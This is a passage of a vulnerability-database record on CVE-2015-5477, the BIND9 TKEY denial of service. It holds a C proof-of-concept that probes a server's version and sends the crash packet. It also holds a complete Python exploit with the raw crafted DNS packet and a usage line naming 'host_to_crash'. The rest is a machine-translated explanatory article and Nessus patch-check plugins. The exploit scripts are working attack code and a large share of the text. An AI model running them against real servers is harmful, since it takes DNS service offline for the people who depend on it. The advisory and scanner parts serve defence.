*/\r\nstatic const unsigned char versionpacket[] = {\r\n 0x03, 0x04, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x00, /* no additional */\r\n\r\n /* Query name */\r\n 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,\r\n 0x00, 16, /* TXT */\r\n 0x00, 3, /* CHOAS */\r\n};\r\n\r\n\r\n/*\r\n * YOLO BIND version.bind query\r\n */\r\nint query_version(int fd, const struct addrinfo *target)\r\n{\r\n int bytes_received;\r\n int i;\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n char hostname[256];\r\n unsigned char buf[2048];\r\n int result = 0;\r\n\r\n /* \r\n * Query version \r\n */\r\n sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, \r\n target->ai_addr, target->ai_addrlen);\r\n\r\n\r\n /* \r\n * get response \r\n */\r\nagain:\r\n bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[-] timed out getting version, trying again\\n\");\r\n return 0;\r\n } else if (bytes_received <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n return 0;\r\n }\r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n\r\n /* \r\n * parse response \r\n */\r\n if (bytes_received < 12)\r\n goto again;\r\n if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])\r\n goto again;\r\n if ((buf[2]&0x80) != 0x80)\r\n goto again;\r\n\r\n /*\r\n * Handle respoonse code \r\n */\r\n switch (buf[3]&0x0F) {\r\n case 0:\r\n /* parse packet below */\r\n break;\r\n case 1:\r\n fprintf(stderr, \"[-] %s: FORMERR\\n\", hostname);\r\n return 1;\r\n case 2:\r\n fprintf(stderr, \"[-] %s: SRVFAIL\\n\", hostname);\r\n return 1;\r\n case 3:\r\n fprintf(stderr, \"[-] %s: NAMERR\\n\", hostname);\r\n return 1;\r\n case 4:\r\n fprintf(stderr, \"[-] %s: NOTIMPL\\n\", hostname);\r\n return 1;\r\n case 5:\r\n fprintf(stderr, \"[-] %s: REFUSED\\n\", hostname);\r\n return 1;\r\n default:\r\n fprintf(stderr, \"[-] %s: unknown error: %u\\n\", hostname, buf[3]);\r\n return 1;\r\n }\r\n\r\n\r\n i = 12; /* skip header */\r\n\r\n /* \r\n * skip query name \r\n */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n i += 4;\r\n\r\n /* \r\n * process all answers \r\n */\r\n while (i + 12 <= bytes_received) {\r\n int t, c, len;\r\n\r\n /* skip answer name */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n\r\n /* extract resource-recorder header */\r\n if (i + 10 > bytes_received)\r\n break;\r\n t = buf[i+0]<<8 | buf[i+1];\r\n c = buf[i+2]<<8 | buf[i+3];\r\n len = buf[i+8]<<8 | buf[i+9];\r\n i += 10;\r\n\r\n /* verify TXT CHAOS */\r\n if (t != 16 || c != 3) {\r\n i += len;\r\n continue;\r\n }\r\n\r\n /* fix len */\r\n if (len > bytes_received - i)\r\n len = bytes_received - i;\r\n\r\n /* print the hostname */\r\n fprintf(stderr, \"[+] %s: \", hostname);\r\n\r\n /* print the strings */\r\n {\r\n int j = i;\r\n\r\n i += len;\r\n\r\n while (j < i) {\r\n int len2 = buf[j];\r\n int k;\r\n j++;\r\n if (len2 > bytes_received - len2)\r\n len2 = bytes_received - len2;\r\n fprintf(stderr, \"\\\"\");\r\n\r\n for (k=j; k<j+len2; k++) {\r\n if (buf[k] == '\\\\')\r\n fprintf(stderr, \"\\\\\");\r\n else if (!isprint(buf[k]))\r\n fprintf(stderr, \"\\\\x%02x\", buf[k]);\r\n else\r\n fprintf(stderr, \"%c\", buf[k]);\r\n }\r\n\r\n j = k;\r\n\r\n fprintf(stderr, \"\\\" \");\r\n }\r\n fprintf(stderr, \"\\n\");\r\n }\r\n result = 1;\r\n }\r\n return result;\r\n}\r\n\r\n/*\r\n * Send the DoS packet\r\n */\r\nvoid probe(const struct addrinfo *target)\r\n{\r\n int fd;\r\n int x;\r\n int i;\r\n char hostname[256];\r\n char buf[2048];\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n \r\n \r\n /*\r\n * Print status\r\n */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[+] %s: Probing...\\n\", hostname);\r\n\r\n /*\r\n * Create a socket\r\n */\r\n fd = socket(target->ai_family, SOCK_DGRAM, 0);\r\n if (fd <= 0) {\r\n fprintf(stderr, \"[-] failed: socket(): %u\\n\", WSAGetLastError());\r\n return;\r\n }\r\n\r\n /*\r\n * Set the timeout to 5-seconds\r\n */\r\n {\r\n#ifdef WIN32\r\n int milliseconds = 5000;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));\r\n#else\r\n struct timeval t;\r\n t.tv_sec = 5;\r\n t.tv_usec = 0;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));\r\n#endif\r\n\r\n if (x != 0) {\r\n fprintf(stderr, \"[-] err setting recv timeout: %u\\n\", WSAGetLastError());\r\n }\r\n }\r\n\r\n\r\n /*\r\n * First, query the server to grab its version, but also to see it's up\r\n */\r\n fprintf(stderr, \"[+] Querying version...\\n\");\r\n for (i=0; i<3; i++) {\r\n if (query_version(fd, target))\r\n break;\r\n if (i == 2) {\r\n fprintf(stderr, \"[-] Can't query server, is it crashed already?\\n\");\r\n fprintf(stderr, \"[-] Sending exploit anyway.\\n\");\r\n }\r\n }\r\n\r\n\r\n /*****************\r\n * SEND DoS PACKET\r\n *****************/\r\n fprintf(stderr, \"[+] Sending DoS packet...\\n\");\r\n sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);\r\n\r\n /* Grab response */\r\n fprintf(stderr, \"[+] Waiting 5-sec for response...\\n\");\r\n for (;;) {\r\n x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[+] timed out, probably crashed\\n\");\r\n break;\r\n } else if (x <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n break;;\r\n }\r\n\r\n if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))\r\n continue;\r\n \r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[-] %s: got response, so probably not vulnerable\\n\", hostname);\r\n break;\r\n }\r\n\r\n\r\n closesocket(fd);\r\n}\r\n\r\n\r\n/*\r\n * The main function just parses the arguments and looks up IP addrsses\r\n * before calling the \"probe\" function to actually exploit the targets\r\n */\r\nint main(int argc, char *argv[])\r\n{\r\n int i;\r\n\r\n#ifdef WIN32\r\n {WSADATA x; WSAStartup(0x101, &x);}\r\n#endif\r\n\r\n fprintf(stderr, \"--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\\n\");\r\n\r\n if (argc <= 1) {\r\n fprintf(stderr, \"[-] no host specified\\n\");\r\n fprintf(stderr, \"usage:\\n tkill <hostname>\\n\");\r\n return -1;\r\n }\r\n\r\n\r\n /*\r\n * Query all targets specified on the command line\r\n */\r\n for (i=1; i<argc; i++) {\r\n const char *hostname = argv[i];\r\n struct addrinfo *info;\r\n struct addrinfo *target;\r\n char oldtarget[256] = \"\";\r\n int x;\r\n\r\n /*\r\n * Lookup the name of the target\r\n */\r\n fprintf(stderr, \"[+] %s: Resolving to IP address\\n\", hostname);\r\n x = getaddrinfo(hostname, \"53\", 0, &info);\r\n if (x != 0) {\r\n fprintf(stderr, \"[-] %s: failed: %s\\n\", hostname, gai_strerror(x));\r\n continue;\r\n }\r\n\r\n if (info->ai_next) {\r\n fprintf(stderr, \"[+] %s: Resolved to multiple IPs (NOTE)\\n\", hostname);\r\n }\r\n\r\n /*\r\n * Since a name can return multiple IP addresses,\r\n * send a probe to all the results\r\n */\r\n for (target=info; target; target = target->ai_next) {\r\n char newtarget[256];\r\n\r\n /* bah, stupid bug in Linux gets the same target multiple\r\n * times */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);\r\n if (strcmp(newtarget, oldtarget) == 0)\r\n continue;\r\n memcpy(oldtarget, newtarget, sizeof(oldtarget));\r\n\r\n probe(target);\r\n printf(\"\\n\");\r\n }\r\n\r\n /*\r\n * Cleanup\r\n */\r\n freeaddrinfo(info);\r\n }\r\n\r\n return 0;\r\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37721/"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:09", "bulletinFamily": "exploit", "description": "", "modified": "2015-07-31T00:00:00", "published": "2015-07-31T00:00:00", "href": "https://packetstormsecurity.com/files/132926/BIND-TKEY-Query-Denial-Of-Service.html", "id": "PACKETSTORM:132926", "type": "packetstorm", "title": "BIND TKEY Query Denial Of Service", "sourceData": "`#!/usr/bin/python \n# Title: BIND Remote DoS via TKEY queries \n# aka: DNS TKEY Query of Death \n# Author: Lorenzo Corsini <serdat> \n# E-Mail: serdat5[at]gmail[dot]com \n# Twitter: https://twitter.com/serdat5tm \n \n# References: \n# https://kb.isc.org/article/AA-01272 \n# https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/ \n \n# Warning there is no way to use this PoC in a non-desruptive manner. \n# Use with care. I'm not responsible for what you'll do with that \n \nimport socket \nimport sys \n \n#Not randomized. \nDNS_PACKET='\\x04X\\x00\\x80\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x03xxx\\x00\\x00\\xf9\\x00\\xff\\x03xxx\\x00\\x00\\xf9\\x00\\xff\\x00\\x00\\x00\\x00\\x00%\\x03xxx\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x00\\x00\\x03xxx\\x00\\x00\\x10\\x00\\xff\\x00\\x00\\x00\\x00\\x00%$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' \n \ntry: \nHOST=sys.argv[1] \nPORT= 53 \nexcept: \nprint \"Usage: %s host_to_crash\" & sys.argv[0] \nsys.exit(-1) \n \nprint \"Exploiting target at %s\" % HOST \n \ns=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) \ns.sendto(DNS_PACKET,(HOST,PORT)) \ns.close() \n \nprint \"Check Manually if the exploit worked... try launching:\" \nprint \"dig @%s CR4SH3D any\" % HOST \n`\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132926/tkey_dos.py.txt"}], "myhack58": [{"lastseen": "2016-11-12T17:51:48", "bulletinFamily": "info", "description": "2 0 1 5 year 7 on 2 8 August, the world's most widely used DNS server bind9 broke a serious denial of service vulnerability, CVE-2 0 1 5-5 4 7 7 to.\n\nA little background: DNS is the domain name mapped to the IP address of the service. When you visit google.com when, the computer will ask you where the cell of the DNS server, google.com the IP address is? If your neighbor also happens in access google.com the DNS server will return directly to its IP; otherwise, the DNS server will go ask Google official DNS server, to give google.com the IP address and return to you. This cell of the DNS server is called a recursive DNS; recursive DNS hung up, will cause it to service the region cannot access to the Internet. Google's official DNS server is called authoritative DNS; the authoritative DNS hung up, cause it to the service site from the face of the earth.\n\n! [](/Article/UploadPic/2015-8/201582165044529.jpg)\n\nDNS recursive queries [image source](<http://www.technicalinfo.net/papers/Pharming.html> the)\n\nThis vulnerability is serious and to what extent? Just send a UDP packet, you can get a hanging one DNS server. Whether it is a recursive DNS or authoritative DNS, regardless of bind9 to do what configuration, as long as this data package is bind9 process of receiving, it will immediately throw an exception and terminate the service.\n\nLUG DNS maintainer Roy Zhang from the Debian Security Notice that this vulnerability and quickly hit on a patch. I write a POC to test out some DNS server, the school DNS to engage in hang up, and report the network center james greatly subsequently received thanks to the testing of most of the operators of the DNS and the smaller some public DNS is also affected by the vulnerability. Now from vulnerability disclosure has been over 7 2 hours, but this serious vulnerability has not yet received enough attention. In the [POC](<https://gist.github.com/bojieli/6d4c370643c6b9f64227>) (Proof of Concept exploit code) to put out, but also to share with you to write the POC process.\n\n### Vulnerability where\n\nTo be timely informed of the vulnerability information, it is recommended to subscribe you care about the release of the Security Tracker. For example Debian on the vulnerability of the [Bulletin](<https://security-tracker.debian.org/tracker/CVE-2015-5477>), from the Source column can be linked to the vulnerability source is CVE, and the other release of the security Bulletin. Description is like this:\n\n\nnamed in ISC BIND 9. x before 9.9.7-P2 and 9.10. x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.\n\nTo further understand this vulnerability the best way is to source code. To fix this vulnerability, bind9 code to do what modifications, bug out somewhere. Ask Google to find the bind9 source tree [Gitweb](<https://source.isc.org/cgi-bin/gitweb.cgi?p=bind9.git;a=summary>), and in the commit log to find this line\n\n\n2015-07-14 Mark Andrews add CVE-2 0 1 5-5 4 7 7\n\nThis is just an illustration, real code changes in it before. We can look through the commit log to find the real code modify.\n\n! [](/Article/UploadPic/2015-8/2 0 1 5 8 2 1 6 5 0 4 4 2 8 6. png)\n\nThe attentive reader may have found, the commit time is 2 0 1 5 year 7 month 1 4 day, which is half a month ago! Yes, vulnerability fix and disclosure process is like that.\n\n1. A vulnerability report, and this was the only vulnerability reported by people and bind9 security team know.\n2. bind9 vulnerability fix.\n3. Notice to some of the \u201cimportant vendors\u201d, including major releases, partnerships with large companies to.\n4. In the negotiated time of public release.\n\nIf you stare at some of the open source software of the warehouse to see, will find some security vulnerabilities were fixed, but the network on almost search anything. A few days later, the CVE database can be checked, each of the transmission line version of the published security advisories, hacker news and the like of the media also began coverage. That is, when we from the \u201cofficial channels\u201d that a vulnerability when it is not 0day, 1day are not.\n\n### Disaster from the ASSERTION\n\nGet down to business. This vulnerability fix is very simple, just add the name = NULL; this word. The problem description said that the illegal packets will cause the assertion fail and quit.\n\nDNS query is a UDP packet, ask a question; the DNS server will respond to a UDP packet, to tell the query answer. DNS query and response packet format is the same, by the question, answer, authority, information, additional information, etc. parts.\n\n! [](/Article/UploadPic/2015-8/201582165044643.jpg)\n\nDNS request format images source\n\nThe problematic code block is this in dns_tkey_processquery function:\n\n! [](/Article/UploadPic/2015-8/2 0 1 5 8 2 1 6 5 0 4 6 9 1 7. png)\n\nThe calling procedure is like this:\n\n1. From the DNS request QUESTION block is found to be a query name stored in the qname is. For example, we query google.com that QUESTION block there is a problem, and its name is google.com the.\n2. From the DNS request the ADDITIONAL blocks found with the query name qname\uff09match the name stored in the name. For legitimate TKEY request, this one place should be a transaction key This is not important, interested students can go to see [the RFC 2 9 3 0](<https://tools.ietf.org/html/rfc2930>). the\n3. If the ADDITIONAL block is not found, then try to go from the ANSWER block. \uff08NIMA Win2000 developer brain pumping?, obviously this is a problem, but put TKEY into the answer block, this is it.\uff09\n\n**[1] [[2]](<65275_2.htm>) [next](<65275_2.htm>)**\n", "modified": "2015-08-02T00:00:00", "published": "2015-08-02T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2015/65275.htm", "id": "MYHACK58:62201565275", "type": "myhack58", "title": "A data packet to eliminate a single server of the DNS vulnerability-vulnerability warning-the black bar safety net", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-07-01T03:53:03", "bulletinFamily": "scanner", "description": "Updated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.", "modified": "2020-07-02T00:00:00", "id": "REDHAT-RHSA-2015-1515.NASL", "href": "https://www.tenable.com/plugins/nessus/85070", "published": "2015-07-29T00:00:00", "title": "RHEL 5 : bind97 (RHSA-2015:1515)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1515. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85070);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1515\");\n\n script_name(english:\"RHEL 5 : bind97 (RHSA-2015:1515)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1515\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-debuginfo-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-debuginfo / bind97-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-06-05T09:27:41", "bulletinFamily": "scanner", "description": "Include fix for CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-08-03T00:00:00", "id": "FEDORA_2015-12357.NASL", "href": "https://www.tenable.com/plugins/nessus/85171", "published": "2015-08-03T00:00:00", "title": "Fedora 21 : bind-9.9.6-10.P1.fc21 (2015-12357)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12357.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85171);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FEDORA\", value:\"2015-12357\");\n\n script_name(english:\"Fedora 21 : bind-9.9.6-10.P1.fc21 (2015-12357)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Include fix for CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1247361\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163007.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d30ea575\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", 